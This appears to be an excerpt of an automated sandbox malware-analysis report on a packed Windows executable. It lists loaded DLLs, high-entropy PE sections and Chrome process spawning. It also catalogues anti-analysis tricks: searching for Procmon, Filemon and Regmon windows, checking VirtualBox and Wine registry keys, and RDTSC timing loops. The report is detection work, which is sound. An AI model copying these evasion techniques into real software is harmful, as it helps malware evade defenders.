              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2128 --field-trial-handle=1972,i,11730012379210978219,17128229350723911199,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: windows.shell.servicehostbuilder.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ieframe.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mlang.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ieframe.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wkscli.dllJump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: file.exeStatic file information: File size 1881088 > 1048576
              Source: file.exeStatic PE information: Raw size of fhggskfg is bigger than: 0x100000 < 0x1a1a00
              Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: file.exe, 00000000.00000002.2620083357.0000000006282000.00000040.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2496082408.00000000081E0000.00000004.00001000.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.720000.0.unpack :EW;.rsrc:W;.idata :W; :EW;fhggskfg:EW;bkvavuwi:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;fhggskfg:EW;bkvavuwi:EW;.taggant:EW;
              Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
              Source: file.exeStatic PE information: real checksum: 0x1d4640 should be: 0x1dacde
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: fhggskfg
              Source: file.exeStatic PE information: section name: bkvavuwi
              Source: file.exeStatic PE information: section name: .taggant
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01352D74 pushfd ; retf 0_3_01352D75
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01352660 push A80135C9h; retf 0_3_01352665
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01353DB4 pushfd ; retf 0_3_01353DB5
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_013535C5 push esp; ret 0_3_013535D6
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_013523CB pushfd ; retf 0_3_013523CC
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0134F5CB pushfd ; retf 0_3_0134F5CC
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01352D74 pushfd ; retf 0_3_01352D75
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01352660 push A80135C9h; retf 0_3_01352665
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01353DB4 pushfd ; retf 0_3_01353DB5
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_013535C5 push esp; ret 0_3_013535D6
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_013523CB pushfd ; retf 0_3_013523CC
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0134F5CB pushfd ; retf 0_3_0134F5CC
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01352D74 pushfd ; retf 0_3_01352D75
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01352660 push A80135C9h; retf 0_3_01352665
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01353DB4 pushfd ; retf 0_3_01353DB5
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_013535C5 push esp; ret 0_3_013535D6
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_013523CB pushfd ; retf 0_3_013523CC
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0134F5CB pushfd ; retf 0_3_0134F5CC
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01352D74 pushfd ; retf 0_3_01352D75
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01352660 push A80135C9h; retf 0_3_01352665
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01353DB4 pushfd ; retf 0_3_01353DB5
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_013535C5 push esp; ret 0_3_013535D6
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_013523CB pushfd ; retf 0_3_013523CC
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0134F5CB pushfd ; retf 0_3_0134F5CC
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01352D74 pushfd ; retf 0_3_01352D75
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01352660 push A80135C9h; retf 0_3_01352665
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01353DB4 pushfd ; retf 0_3_01353DB5
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_013535C5 push esp; ret 0_3_013535D6
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_013523CB pushfd ; retf 0_3_013523CC
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0134F5CB pushfd ; retf 0_3_0134F5CC
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01352D74 pushfd ; retf 0_3_01352D75
              Source: file.exeStatic PE information: section name: entropy: 7.966227405205919
              Source: file.exeStatic PE information: section name: fhggskfg entropy: 7.953737215488932

              Boot Survival

              barindex
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Users\user\Desktop\file.exeSystem information queried: FirmwareTableInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77C3DA second address: 77C3F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5A4D20A9FFh 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pushad 0x0000000f popad 0x00000010 pop eax 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 903A71 second address: 903A75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 903A75 second address: 903A9B instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F5A4D20A9F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F5A4D20AA07h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FB088 second address: 8FB092 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FB092 second address: 8FB0B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F5A4D20AA08h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FB0B1 second address: 8FB0B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FB0B5 second address: 8FB0DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F5A4D20AA02h 0x0000000c jbe 00007F5A4D20A9F6h 0x00000012 jnp 00007F5A4D20A9F6h 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FB0DF second address: 8FB0E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FB0E5 second address: 8FB117 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F5A4D20AA05h 0x00000012 pushad 0x00000013 popad 0x00000014 push edi 0x00000015 pop edi 0x00000016 popad 0x00000017 pushad 0x00000018 push edi 0x00000019 pop edi 0x0000001a je 00007F5A4D20A9F6h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 906EF5 second address: 906EFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F5A4CBCDC66h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 906EFF second address: 906F03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 906F03 second address: 906F5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a pushad 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e pop edx 0x0000000f jnl 00007F5A4CBCDC6Ch 0x00000015 popad 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a jmp 00007F5A4CBCDC72h 0x0000001f pop eax 0x00000020 or ecx, dword ptr [ebp+122D3A12h] 0x00000026 lea ebx, dword ptr [ebp+1245ECD1h] 0x0000002c mov edi, 767CFC0Fh 0x00000031 xchg eax, ebx 0x00000032 push eax 0x00000033 push edx 0x00000034 jo 00007F5A4CBCDC70h 0x0000003a jmp 00007F5A4CBCDC6Ah 0x0000003f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 907084 second address: 907098 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c ja 00007F5A4D20A9F8h 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 907098 second address: 907119 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F5A4CBCDC79h 0x00000008 jmp 00007F5A4CBCDC73h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 pushad 0x00000014 jnp 00007F5A4CBCDC6Ch 0x0000001a pushad 0x0000001b jmp 00007F5A4CBCDC75h 0x00000020 jmp 00007F5A4CBCDC6Eh 0x00000025 popad 0x00000026 popad 0x00000027 pop eax 0x00000028 jmp 00007F5A4CBCDC79h 0x0000002d lea ebx, dword ptr [ebp+1245ECDAh] 0x00000033 mov dword ptr [ebp+122D1985h], esi 0x00000039 push eax 0x0000003a push eax 0x0000003b push edx 0x0000003c push ecx 0x0000003d push eax 0x0000003e pop eax 0x0000003f pop ecx 0x00000040 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 926FD5 second address: 926FFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5A4D20AA02h 0x00000009 pop edi 0x0000000a js 00007F5A4D20A9FEh 0x00000010 jp 00007F5A4D20A9F6h 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 926FFA second address: 927047 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F5A4CBCDC6Dh 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b popad 0x0000000c pop eax 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push ecx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 push edx 0x00000014 pop edx 0x00000015 pop ecx 0x00000016 je 00007F5A4CBCDC84h 0x0000001c jmp 00007F5A4CBCDC78h 0x00000021 jp 00007F5A4CBCDC66h 0x00000027 jns 00007F5A4CBCDC68h 0x0000002d push edi 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 924ECA second address: 924EF4 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F5A4D20A9FEh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b jmp 00007F5A4D20AA03h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 924EF4 second address: 924EF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 924EF8 second address: 924EFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92518E second address: 925192 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 925192 second address: 9251C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5A4D20AA09h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F5A4D20A9FCh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 925332 second address: 92533D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92533D second address: 925343 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 925343 second address: 925347 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 925347 second address: 92534B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92534B second address: 925357 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F5A4CBCDC66h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 925357 second address: 92535C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92590C second address: 925910 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 925910 second address: 925914 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 925914 second address: 925920 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 925920 second address: 925933 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5A4D20A9FFh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 925AC0 second address: 925AD8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A4CBCDC74h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 925AD8 second address: 925ADD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 925C2E second address: 925C34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 925C34 second address: 925C42 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007F5A4D20A9FCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 925DEE second address: 925DF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 925DF2 second address: 925E00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F5A4D20AA02h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 925F78 second address: 925F7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9260C4 second address: 9260C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9260C8 second address: 9260D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jnp 00007F5A4CBCDC66h 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91C385 second address: 91C389 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91C389 second address: 91C3A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F5A4CBCDC72h 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91C3A5 second address: 91C3AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F5A4D20A9F6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91C3AF second address: 91C3B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91C3B3 second address: 91C3B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
